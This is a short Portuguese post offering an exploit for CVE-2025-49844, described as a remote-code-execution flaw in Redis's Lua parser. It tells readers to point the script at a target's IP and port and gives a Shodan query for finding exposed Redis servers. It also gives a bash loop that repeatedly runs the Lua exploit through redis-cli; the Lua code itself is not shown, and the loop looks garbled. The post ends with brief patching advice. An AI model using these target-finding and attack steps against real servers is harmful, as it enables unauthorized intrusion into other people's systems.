
Script de exploração para CVE-2025-49844, uma vulnerabilidade de use-after-free no parser Lua do Redis, que permite execução remota de código em servidores Redis vulneráveis.
Resumo e simples: você executa este script e, em vez de
localhost
você coloca o IP do alvo e também configura a porta, ele conecta se for vulnerável e você pode executar o comando que quiser.
No Shodan, você também pode encontrar alvos vulneráveis com este payload
product:"Redis key-value store"
Verifique a versão, se for inferior a 8.2
while redis-cli -h localhost -p 6379 --eval CVE-2025-49844.lua >/dev/null; do
printf 'connect to server :) RCE'
done
Se puder, atualize o Redis para 8.2.2 ou mais recente.
Se não puder atualizar, pelo menos desative a execução de Lua para usuários anônimos ou não confiáveis.